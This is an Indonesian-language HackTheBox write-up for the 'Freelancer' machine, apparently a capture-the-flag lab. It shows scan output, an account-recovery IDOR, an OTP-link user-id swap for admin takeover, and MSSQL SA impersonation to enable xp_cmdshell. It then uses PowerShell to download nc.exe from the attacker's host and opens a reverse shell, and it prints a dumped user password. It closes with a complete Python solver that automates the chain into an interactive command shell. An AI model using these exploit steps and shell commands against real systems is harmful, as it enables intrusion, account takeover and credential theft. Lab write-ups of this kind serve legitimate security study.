🆓Freelancer

User Flag

Enumeration

Recon awal selalu pakai port scanning dan jika port http open kita dapat melakukan dirsearch.

naabu --host 10.129.57.150 -v -p - -nmap-cli 'nmap -sV' -o 10.129.57.150.port

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

		projectdiscovery.io

[INF] Current naabu version 2.3.1 (latest)
[INF] Running CONNECT scan with non root privileges
10.129.57.150:49671
10.129.57.150:49667
10.129.57.150:3268
10.129.57.150:53
10.129.57.150:52941
10.129.57.150:9389
10.129.57.150:5985
10.129.57.150:636
10.129.57.150:3269
10.129.57.150:593
10.129.57.150:49670
10.129.57.150:135
10.129.57.150:49672
10.129.57.150:139
10.129.57.150:445
10.129.57.150:80
10.129.57.150:88
10.129.57.150:52945
10.129.57.150:389
10.129.57.150:55820
10.129.57.150:55824
[INF] Found 21 ports on host 10.129.57.150 (10.129.57.150)
[INF] Running nmap command: nmap -sV -p 55820,636,49670,139,49671,3268,135,52945,55824,9389,593,5985,3269,389,445,88,52941,49667,49672,53,80 10.129.57.150
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-02 20:44 WIB
Nmap scan report for freelancer.htb (10.129.57.150)
Host is up (0.30s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          nginx 1.25.5
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-02 18:44:16Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open     msrpc         Microsoft Windows RPC
49672/tcp open     msrpc         Microsoft Windows RPC
52941/tcp filtered unknown
52945/tcp filtered unknown
55820/tcp open     msrpc         Microsoft Windows RPC
55824/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds

hasil dirsearch kepada port 80.

dirsearch -u http://freelancer.htb
/usr/share/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11723

Output: /home/replican/Desktop/Prod/HackTheBox/machine/Freelancer/reports/http_freelancer.htb/__24-06-02_21-13-58.txt

Target: http://freelancer.htb/

[21:13:58] Starting:
[21:14:44] 400 -  157B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:14:48] 301 -    0B  - /about  ->  /about/
[21:14:51] 301 -    0B  - /accounts/login  ->  /accounts/login/
[21:14:55] 301 -    0B  - /admin  ->  /admin/
[21:14:58] 302 -    0B  - /admin/  ->  /admin/login/?next=/admin/
[21:14:58] 302 -    0B  - /admin/%3bindex/  ->  /admin/login/?next=/admin/%253Bindex/
[21:14:58] 302 -    0B  - /admin/.config  ->  /admin/login/?next=/admin/.config
[21:14:58] 302 -    0B  - /admin/.htaccess  ->  /admin/login/?next=/admin/.htaccess
[21:14:58] 302 -    0B  - /admin/_logs/access-log  ->  /admin/login/?next=/admin/_logs/access-log
[21:14:58] 302 -    0B  - /admin/_logs/access.log  ->  /admin/login/?next=/admin/_logs/access.log
[21:14:58] 302 -    0B  - /admin/_logs/access_log  ->  /admin/login/?next=/admin/_logs/access_log
[21:14:58] 302 -    0B  - /admin/_logs/err.log  ->  /admin/login/?next=/admin/_logs/err.log
[21:14:58] 302 -    0B  - /admin/_logs/error.log  ->  /admin/login/?next=/admin/_logs/error.log
[21:14:58] 302 -    0B  - /admin/_logs/error-log  ->  /admin/login/?next=/admin/_logs/error-log
[21:14:58] 302 -    0B  - /admin/_logs/error_log  ->  /admin/login/?next=/admin/_logs/error_log
[21:14:58] 302 -    0B  - /admin/access.log  ->  /admin/login/?next=/admin/access.log
[21:14:58] 302 -    0B  - /admin/access_log  ->  /admin/login/?next=/admin/access_log
[21:14:58] 302 -    0B  - /admin/access.txt  ->  /admin/login/?next=/admin/access.txt
[21:14:58] 302 -    0B  - /admin/account  ->  /admin/login/?next=/admin/account
[21:14:58] 302 -    0B  - /admin/account.aspx  ->  /admin/login/?next=/admin/account.aspx
[21:14:58] 302 -    0B  - /admin/account.php  ->  /admin/login/?next=/admin/account.php
[21:14:58] 302 -    0B  - /admin/account.jsp  ->  /admin/login/?next=/admin/account.jsp
[21:14:58] 302 -    0B  - /admin/account.js  ->  /admin/login/?next=/admin/account.js
[21:14:58] 302 -    0B  - /admin/_logs/login.txt  ->  /admin/login/?next=/admin/_logs/login.txt
[21:14:58] 302 -    0B  - /admin/admin-login  ->  /admin/login/?next=/admin/admin-login
[21:14:58] 302 -    0B  - /admin/admin-login.php  ->  /admin/login/?next=/admin/admin-login.php
[21:14:58] 302 -    0B  - /admin/admin-login.aspx  ->  /admin/login/?next=/admin/admin-login.aspx
[21:14:58] 302 -    0B  - /admin/account.html  ->  /admin/login/?next=/admin/account.html
[21:14:59] 302 -    0B  - /admin/admin-login.jsp  ->  /admin/login/?next=/admin/admin-login.jsp
[21:14:58] 302 -    0B  - /admin/admin  ->  /admin/login/?next=/admin/admin
[21:14:59] 302 -    0B  - /admin/admin-login.html  ->  /admin/login/?next=/admin/admin-login.html
[21:14:59] 302 -    0B  - /admin/admin-login.js  ->  /admin/login/?next=/admin/admin-login.js
[21:14:59] 302 -    0B  - /admin/admin.php  ->  /admin/login/?next=/admin/admin.php
[21:14:59] 302 -    0B  - /admin/admin.jsp  ->  /admin/login/?next=/admin/admin.jsp
[21:14:59] 302 -    0B  - /admin/admin.html  ->  /admin/login/?next=/admin/admin.html
[21:14:59] 302 -    0B  - /admin/admin.js  ->  /admin/login/?next=/admin/admin.js
[21:14:59] 302 -    0B  - /admin/admin.aspx  ->  /admin/login/?next=/admin/admin.aspx
[21:14:59] 302 -    0B  - /admin/admin/login  ->  /admin/login/?next=/admin/admin/login
[21:14:59] 302 -    0B  - /admin/admin_login  ->  /admin/login/?next=/admin/admin_login
[21:14:59] 302 -    0B  - /admin/admin_login.aspx  ->  /admin/login/?next=/admin/admin_login.aspx
[21:14:59] 302 -    0B  - /admin/admin_login.php  ->  /admin/login/?next=/admin/admin_login.php
[21:14:59] 302 -    0B  - /admin/admin_login.html  ->  /admin/login/?next=/admin/admin_login.html
[21:14:59] 302 -    0B  - /admin/adminLogin  ->  /admin/login/?next=/admin/adminLogin
[21:14:59] 302 -    0B  - /admin/admin_login.js  ->  /admin/login/?next=/admin/admin_login.js
[21:14:59] 302 -    0B  - /admin/admin_login.jsp  ->  /admin/login/?next=/admin/admin_login.jsp
[21:14:59] 302 -    0B  - /admin/adminLogin.php  ->  /admin/login/?next=/admin/adminLogin.php
[21:15:00] 302 -    0B  - /admin/adminLogin.aspx  ->  /admin/login/?next=/admin/adminLogin.aspx
[21:14:59] 302 -    0B  - /admin/adminer.php  ->  /admin/login/?next=/admin/adminer.php
[21:15:00] 302 -    0B  - /admin/backup/  ->  /admin/login/?next=/admin/backup/
[21:15:00] 302 -    0B  - /admin/adminLogin.js  ->  /admin/login/?next=/admin/adminLogin.js
[21:15:00] 302 -    0B  - /admin/adminLogin.html  ->  /admin/login/?next=/admin/adminLogin.html
[21:15:00] 302 -    0B  - /admin/backups/  ->  /admin/login/?next=/admin/backups/
[21:15:00] 302 -    0B  - /admin/controlpanel  ->  /admin/login/?next=/admin/controlpanel
[21:14:59] 302 -    0B  - /admin/adminLogin.jsp  ->  /admin/login/?next=/admin/adminLogin.jsp
[21:15:00] 302 -    0B  - /admin/config.php  ->  /admin/login/?next=/admin/config.php
[21:15:00] 302 -    0B  - /admin/controlpanel.php  ->  /admin/login/?next=/admin/controlpanel.php
[21:15:00] 302 -    0B  - /admin/controlpanel.aspx  ->  /admin/login/?next=/admin/controlpanel.aspx
[21:15:00] 302 -    0B  - /admin/controlpanel.jsp  ->  /admin/login/?next=/admin/controlpanel.jsp
[21:15:00] 302 -    0B  - /admin/cp.php  ->  /admin/login/?next=/admin/cp.php
[21:15:00] 302 -    0B  - /admin/controlpanel.js  ->  /admin/login/?next=/admin/controlpanel.js
[21:15:00] 302 -    0B  - /admin/cp  ->  /admin/login/?next=/admin/cp
[21:15:00] 302 -    0B  - /admin/cp.aspx  ->  /admin/login/?next=/admin/cp.aspx
[21:15:00] 302 -    0B  - /admin/cp.jsp  ->  /admin/login/?next=/admin/cp.jsp
[21:15:00] 302 -    0B  - /admin/controlpanel.html  ->  /admin/login/?next=/admin/controlpanel.html
[21:15:00] 302 -    0B  - /admin/cp.html  ->  /admin/login/?next=/admin/cp.html
[21:15:00] 302 -    0B  - /admin/cp.js  ->  /admin/login/?next=/admin/cp.js
[21:15:00] 302 -    0B  - /admin/data/autosuggest  ->  /admin/login/?next=/admin/data/autosuggest
[21:15:00] 302 -    0B  - /admin/db/  ->  /admin/login/?next=/admin/db/
[21:15:00] 302 -    0B  - /admin/default  ->  /admin/login/?next=/admin/default
[21:15:00] 302 -    0B  - /admin/default.asp  ->  /admin/login/?next=/admin/default.asp
[21:15:01] 302 -    0B  - /admin/default/admin.asp  ->  /admin/login/?next=/admin/default/admin.asp
[21:15:01] 302 -    0B  - /admin/default/login.asp  ->  /admin/login/?next=/admin/default/login.asp
[21:15:01] 302 -    0B  - /admin/download.php  ->  /admin/login/?next=/admin/download.php
[21:15:01] 302 -    0B  - /admin/dumper/  ->  /admin/login/?next=/admin/dumper/
[21:15:01] 302 -    0B  - /admin/error.log  ->  /admin/login/?next=/admin/error.log
[21:15:01] 302 -    0B  - /admin/error.txt  ->  /admin/login/?next=/admin/error.txt
[21:15:01] 302 -    0B  - /admin/error_log  ->  /admin/login/?next=/admin/error_log
[21:15:01] 302 -    0B  - /admin/FCKeditor  ->  /admin/login/?next=/admin/FCKeditor
[21:15:01] 302 -    0B  - /admin/errors.log  ->  /admin/login/?next=/admin/errors.log
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[21:15:01] 302 -    0B  - /admin/export.php  ->  /admin/login/?next=/admin/export.php
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/php/connector.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/connector.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/php/upload.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/upload.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/php/upload.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/php/upload.php
[21:15:02] 302 -    0B  - /admin/file.php  ->  /admin/login/?next=/admin/file.php
[21:15:02] 302 -    0B  - /admin/files.php  ->  /admin/login/?next=/admin/files.php
[21:15:02] 302 -    0B  - /admin/heapdump  ->  /admin/login/?next=/admin/heapdump
[21:15:02] 302 -    0B  - /admin/home  ->  /admin/login/?next=/admin/home
[21:15:02] 302 -    0B  - /admin/home.php  ->  /admin/login/?next=/admin/home.php
[21:15:02] 302 -    0B  - /admin/home.jsp  ->  /admin/login/?next=/admin/home.jsp
[21:15:02] 302 -    0B  - /admin/home.aspx  ->  /admin/login/?next=/admin/home.aspx
[21:15:02] 302 -    0B  - /admin/home.js  ->  /admin/login/?next=/admin/home.js
[21:15:02] 302 -    0B  - /admin/index  ->  /admin/login/?next=/admin/index
[21:15:02] 302 -    0B  - /admin/home.html  ->  /admin/login/?next=/admin/home.html
[21:15:02] 302 -    0B  - /admin/index.aspx  ->  /admin/login/?next=/admin/index.aspx
[21:15:02] 302 -    0B  - /admin/index.jsp  ->  /admin/login/?next=/admin/index.jsp
[21:15:02] 302 -    0B  - /admin/index.php  ->  /admin/login/?next=/admin/index.php
[21:15:02] 302 -    0B  - /admin/includes/configure.php~  ->  /admin/login/?next=/admin/includes/configure.php~
[21:15:02] 302 -    0B  - /admin/index.html  ->  /admin/login/?next=/admin/index.html
[21:15:02] 302 -    0B  - /admin/js/tiny_mce  ->  /admin/login/?next=/admin/js/tiny_mce
[21:15:02] 302 -    0B  - /admin/index.js  ->  /admin/login/?next=/admin/index.js
[21:15:02] 302 -    0B  - /admin/js/tiny_mce/  ->  /admin/login/?next=/admin/js/tiny_mce/
[21:15:02] 302 -    0B  - /admin/js/tinymce  ->  /admin/login/?next=/admin/js/tinymce
[21:15:03] 302 -    0B  - /admin/js/tinymce/  ->  /admin/login/?next=/admin/js/tinymce/
[21:15:03] 302 -    0B  - /admin/log  ->  /admin/login/?next=/admin/log
[21:15:03] 302 -    0B  - /admin/login  ->  /admin/login/?next=/admin/login
[21:15:03] 302 -    0B  - /admin/log/error.log  ->  /admin/login/?next=/admin/log/error.log
[21:15:03] 302 -    0B  - /admin/login.aspx  ->  /admin/login/?next=/admin/login.aspx
[21:15:03] 302 -    0B  - /admin/login.php  ->  /admin/login/?next=/admin/login.php
[21:15:03] 302 -    0B  - /admin/login.jsp  ->  /admin/login/?next=/admin/login.jsp
[21:15:03] 302 -    0B  - /admin/login.html  ->  /admin/login/?next=/admin/login.html
[21:15:03] 302 -    0B  - /admin/login.js  ->  /admin/login/?next=/admin/login.js
[21:15:03] 302 -    0B  - /admin/login.asp  ->  /admin/login/?next=/admin/login.asp
[21:15:04] 302 -    0B  - /admin/login.do  ->  /admin/login/?next=/admin/login.do
[21:15:04] 302 -    0B  - /admin/login.py  ->  /admin/login/?next=/admin/login.py
[21:15:04] 302 -    0B  - /admin/login.htm  ->  /admin/login/?next=/admin/login.htm
[21:15:04] 302 -    0B  - /admin/login.rb  ->  /admin/login/?next=/admin/login.rb
[21:15:04] 302 -    0B  - /admin/logon  ->  /admin/login/?next=/admin/logon
[21:15:04] 302 -    0B  - /admin/logon.jsp  ->  /admin/login/?next=/admin/logon.jsp
[21:15:04] 302 -    0B  - /admin/logon.aspx  ->  /admin/login/?next=/admin/logon.aspx
[21:15:04] 302 -    0B  - /admin/logon.html  ->  /admin/login/?next=/admin/logon.html
[21:15:04] 302 -    0B  - /admin/logs/access-log  ->  /admin/login/?next=/admin/logs/access-log
[21:15:04] 302 -    0B  - /admin/logs/err.log  ->  /admin/login/?next=/admin/logs/err.log
[21:15:04] 302 -    0B  - /admin/logs/access.log  ->  /admin/login/?next=/admin/logs/access.log
[21:15:04] 302 -    0B  - /admin/logs/access_log  ->  /admin/login/?next=/admin/logs/access_log
[21:15:04] 302 -    0B  - /admin/logon.php  ->  /admin/login/?next=/admin/logon.php
[21:15:04] 302 -    0B  - /admin/logs/error-log  ->  /admin/login/?next=/admin/logs/error-log
[21:15:04] 302 -    0B  - /admin/logon.js  ->  /admin/login/?next=/admin/logon.js
[21:15:04] 302 -    0B  - /admin/logs/  ->  /admin/login/?next=/admin/logs/
[21:15:04] 302 -    0B  - /admin/logs/error.log  ->  /admin/login/?next=/admin/logs/error.log
[21:15:04] 302 -    0B  - /admin/logs/error_log  ->  /admin/login/?next=/admin/logs/error_log
[21:15:04] 302 -    0B  - /admin/logs/errors.log  ->  /admin/login/?next=/admin/logs/errors.log
[21:15:04] 302 -    0B  - /admin/logs/login.txt  ->  /admin/login/?next=/admin/logs/login.txt
[21:15:04] 302 -    0B  - /admin/manage.asp  ->  /admin/login/?next=/admin/manage.asp
[21:15:04] 302 -    0B  - /admin/manage/admin.asp  ->  /admin/login/?next=/admin/manage/admin.asp
[21:15:04] 302 -    0B  - /admin/manage  ->  /admin/login/?next=/admin/manage
[21:15:05] 302 -    0B  - /admin/manage/login.asp  ->  /admin/login/?next=/admin/manage/login.asp
[21:15:05] 302 -    0B  - /admin/mysql/index.php  ->  /admin/login/?next=/admin/mysql/index.php
[21:15:05] 302 -    0B  - /admin/mysql/  ->  /admin/login/?next=/admin/mysql/
[21:15:05] 302 -    0B  - /admin/mysql2/index.php  ->  /admin/login/?next=/admin/mysql2/index.php
[21:15:05] 302 -    0B  - /admin/phpMyAdmin  ->  /admin/login/?next=/admin/phpMyAdmin
[21:15:05] 302 -    0B  - /admin/phpMyAdmin/  ->  /admin/login/?next=/admin/phpMyAdmin/
[21:15:05] 302 -    0B  - /admin/phpmyadmin/  ->  /admin/login/?next=/admin/phpmyadmin/
[21:15:05] 302 -    0B  - /admin/pMA/  ->  /admin/login/?next=/admin/pMA/
[21:15:05] 302 -    0B  - /admin/phpMyAdmin/index.php  ->  /admin/login/?next=/admin/phpMyAdmin/index.php
[21:15:05] 302 -    0B  - /admin/pma/  ->  /admin/login/?next=/admin/pma/
[21:15:05] 302 -    0B  - /admin/phpmyadmin2/index.php  ->  /admin/login/?next=/admin/phpmyadmin2/index.php
[21:15:05] 302 -    0B  - /admin/pma/index.php  ->  /admin/login/?next=/admin/pma/index.php
[21:15:05] 302 -    0B  - /admin/PMA/index.php  ->  /admin/login/?next=/admin/PMA/index.php
[21:15:05] 302 -    0B  - /admin/pol_log.txt  ->  /admin/login/?next=/admin/pol_log.txt
[21:15:05] 302 -    0B  - /admin/phpmyadmin/index.php  ->  /admin/login/?next=/admin/phpmyadmin/index.php
[21:15:06] 302 -    0B  - /admin/release  ->  /admin/login/?next=/admin/release
[21:15:06] 302 -    0B  - /admin/private/logs  ->  /admin/login/?next=/admin/private/logs
[21:15:06] 302 -    0B  - /admin/scripts/fckeditor  ->  /admin/login/?next=/admin/scripts/fckeditor
[21:15:06] 302 -    0B  - /admin/secure/logon.jsp  ->  /admin/login/?next=/admin/secure/logon.jsp
[21:15:06] 302 -    0B  - /admin/sqladmin/  ->  /admin/login/?next=/admin/sqladmin/
[21:15:06] 302 -    0B  - /admin/portalcollect.php?f=http://xxx&t=js  ->  /admin/login/?next=/admin/portalcollect.php%3Ff%3Dhttp%3A//xxx%26t%3Djs
[21:15:06] 302 -    0B  - /admin/sxd/  ->  /admin/login/?next=/admin/sxd/
[21:15:06] 302 -    0B  - /admin/sysadmin/  ->  /admin/login/?next=/admin/sysadmin/
[21:15:06] 302 -    0B  - /admin/tinymce  ->  /admin/login/?next=/admin/tinymce
[21:15:06] 302 -    0B  - /admin/upload.php  ->  /admin/login/?next=/admin/upload.php
[21:15:06] 302 -    0B  - /admin/uploads.php  ->  /admin/login/?next=/admin/uploads.php
[21:15:06] 302 -    0B  - /admin/signin  ->  /admin/login/?next=/admin/signin
[21:15:06] 302 -    0B  - /admin/user_count.txt  ->  /admin/login/?next=/admin/user_count.txt
[21:15:06] 302 -    0B  - /admin/views/ajax/autocomplete/user/a  ->  /admin/login/?next=/admin/views/ajax/autocomplete/user/a
[21:15:06] 302 -    0B  - /admin/web/  ->  /admin/login/?next=/admin/web/
[21:15:06] 302 -    0B  - /admin/tiny_mce  ->  /admin/login/?next=/admin/tiny_mce
[21:15:53] 301 -    0B  - /blog  ->  /blog/
[21:15:54] 200 -   19KB - /blog/
[21:16:07] 301 -    0B  - /contact  ->  /contact/
[21:16:46] 400 -  157B  - /index.php::$DATA
[21:18:00] 404 -  555B  - /static/api/swagger.json
[21:18:00] 404 -  555B  - /static/api/swagger.yaml
[21:18:00] 404 -  555B  - /static/dump.sql
[21:18:12] 400 -  157B  - /Trace.axd::$DATA
[21:18:24] 400 -  157B  - /web.config::$DATA

Task Completed

terdapat port 80 lgsg kita pentest saja, terdapa bug validation idor. ketika kita register menjadi employer tidak akan bisa karna butuh divalidasi. lgsg saja kita akses

http://freelancer.htb/accounts/recovery/freelancer.htb

akses nya pake akun freelancer ( register jika belum )

dan input username employer yang kalian mau aktifkan

dan ketika sudah dijawab seperti yg kalian daftarkan sebelumnya maka akun emplyernya akan teraktivasi

terdapat fitur QR Code dan ketika kita scan qr nya

terdapat sebuah base64 MTAwMTE yang berarti 10011, seperti user id. disini saya mencoba menggantinya menjadi 2 yang di base64

contoh : http://freelancer.htb/accounts/login/otp/MTAwMTE=/f41c9032a6f7c2c50ec62b7ef8b31d16/

jadi : http://freelancer.htb/accounts/login/otp/Mgo=/f41c9032a6f7c2c50ec62b7ef8b31d16/

dan yep kita jadi admin sekarang.seperti scanning dirsearch diatas ada path /admin kita lgsg kesana

pas aku coba show tables ternyata db ini adalah disini tujian kita yaitu spawn xp_cmdshell karna ini windows juga.

Bypassing sysadmin users

karna disini kita bukan sysadmin dan xp_cmdshell di disable dengan sp_configure. kita perlu melakukan privilage menggunakan command berikut

EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'

-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

dan sehabis itu kita baru dapat menggunakan xp_cmdshell

lgsg saja kita buat revshell. disini saya pakai nc binary

xp_cmdshell 'echo IWR http://10.10.14.88:1337/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'

 xp_cmdshell '%TEMP%\nc.exe 10.10.14.88 1338 -e powershell'

dan yep kita dapet in revshell

lgsg kita dump aja sql user pw nya buat dapetin mikasha user shell

IL0v3ErenY3ager ini pw nya tinggal RunAs aja yak ges

menggunakan RunAsCs.exe

Solver python script

import httpx
from bs4 import BeautifulSoup
from pwn import *
from PIL import Image
from io import BytesIO
from pyzbar.pyzbar import decode
import re

URL = "http://freelancer.htb"
# change this to debug if you want to see the csrf logger
context.log_level = 'info'

class BaseAPI:
    def __init__(self, url=URL) -> None:
        self.c = httpx.Client(base_url=url, proxy={
            "http://" : "http://127.0.0.1:8080"
        })
        
    
   
class API(BaseAPI):
    def getCsrfToken(self,path):
        if hasattr(self, 'admin_cookies'):

            r = self.c.get(path, cookies={
                'sessionid' : self.admin_cookies
            }, follow_redirects=True)
         
        else:
            r = self.c.get(path)
        self.csrf_token = r.cookies["csrftoken"]
        soup = BeautifulSoup(r.text, "html.parser")
        csrf = soup.find("input", {"name": "csrfmiddlewaretoken"})
        if csrf:
            csrf_value = csrf["value"]
            self.csrf_middleware = csrf_value
            debug(f"csrf/{self.csrf_middleware} from path{path}")
        else:
            csrf_value = re.findall(r'csrfmiddlewaretoken: "(.*?)"', r.text)
            if len(csrf_value) >= 1:
                self.csrf_middleware = csrf_value[0]
                debug(f"csrf/{self.csrf_middleware} from path{path}")
            else:
                warn("csrf token/middleware is not found")
        
    
    def FreelancerLogin(self, user, password):
        path = "/accounts/login/"
        self.getCsrfToken(path)
        r = self.c.post(path, data={
             "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "password" : password
        })
        self.freelancer_sessionid = r.cookies["sessionid"]
        info(f"success login freelancer account {user}:{password}")
    def EmployerLogin(self, user, password):
        path = "/accounts/login/"
        self.getCsrfToken(path)
        r = self.c.post(path, data={
             "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "password" : password
        })
        self.employer_sessionid = r.cookies["sessionid"]
        info(f"success login employer account {user}:{password}")
    def createAccountFreelancer(self, user, passwd):
        path = "/freelancer/register/"
        self.getCsrfToken(path)
        r = self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "email" : f"{user}@gmail.com",
            "first_name": user,
            "last_name": user,
            "address" : user,
            "security_q1": user,
            "security_q2": user,
            "security_q3": user,
            "job_title": user,
            "years_of_experience": 33,
            "description": user,
            "password1": passwd,
            "password2": passwd
        }, cookies={
            "csrftoken" : self.csrf_token
        }, headers={'Content-Type': 'application/x-www-form-urlencoded'} )
        
        api.FreelancerLogin(user,passwd)
        
    def createAccountEmployer(self, user, passwd):
        path = "/employer/register/"
        self.getCsrfToken(path)
        r =  self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "email" : f"{user}@gmail.com",
            "first_name": user,
            "last_name": user,
            "address" : user,
            "security_q1": user,
            "security_q2": user,
            "security_q3": user,
            "company_name": user,
            "password1": passwd,
            "password2": passwd
        }, cookies={
            "csrftoken" : self.csrf_token
        }, headers={'Content-Type': 'application/x-www-form-urlencoded'} , follow_redirects=False)
        info(f"success create emplyer account {user}:{passwd}")
        
    def ActivateAccountIDOR(self, userEmployer, password):
        path = "/accounts/recovery/"
        self.getCsrfToken(path)
        r = self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": userEmployer,
            "security_q1": userEmployer,
            "security_q2": userEmployer,
            "security_q3": userEmployer,
        }, cookies={
            "sessionid":self.freelancer_sessionid
        })
        api.EmployerLogin(userEmployer, password)
        return "success activate employer account through idor account recovery"
    def GetQrCode(self, idTakeover):
        path = "/accounts/otp/qrcode/generate/" 
        r = self.c.get(path, cookies={
            "sessionid" :self.employer_sessionid
        })
        image = Image.open(BytesIO(r.content))
        qr_codes = decode(image)
        for qr_code in qr_codes:
            match = re.search(r'otp/([^/]+)/', qr_code.data.decode('utf-8'))
            if match:
                otp_string = match.group(1)
                decoded_otp_string = base64.b64decode(otp_string).decode()
                encoded_idTakeover = base64.b64encode(idTakeover.encode()).decode()
                info(f'changing id for otp {otp_string}:{decoded_otp_string} to {encoded_idTakeover}:{idTakeover}')
                self.adminUrl = qr_code.data.decode('utf-8').replace(otp_string, encoded_idTakeover)
                success(f'here the full link {self.adminUrl}, for admin takeover. enjoy it.' )
            else:
                error("No match found")
                
    def LoginAdmin(self):
        r = self.c.get(f"{self.adminUrl}")
        self.admin_cookies = r.cookies["sessionid"]
    
    def QuerySqli(self, query):
        path = "/admin/executeRawSql/" 
        self.getCsrfToken("/admin")
        return self.c.post(path, data={
            'query': query,
            'csrfmiddlewaretoken' : self.csrf_middleware
        }, cookies={
            'sessionid': self.admin_cookies
        })
        
    def BypassXpCmdShell(self):
        api.LoginAdmin()
        info(f'admin cookies : {self.admin_cookies}')
        api.QuerySqli("""EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'""")
        api.QuerySqli("""

-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

""")    
    def RceSqli(self,cmd):
        
        rows = api.QuerySqli(f"xp_cmdshell '{cmd}'").json().get('result', {}).get('rows', [])
        for row in rows:
            if len(row) >= 1:
                success(row[0])
        
    ...

if __name__ == "__main__":
    api = API()
    api.createAccountFreelancer('replicannormal', '@Hack4you1337')
    api.createAccountEmployer('replicanlw', '@Hack4you1337')
    info(api.ActivateAccountIDOR('replicanlw', '@Hack4you1337'))
    api.GetQrCode(idTakeover='2')
    isRce = input(info('do u want to get the rce automatically through xp_cmdshell? (y/n)'))
    if "y" or "Y" in isRce:
        api.BypassXpCmdShell()
        while True:
            cmd = input('cmd > ')
            api.RceSqli(cmd)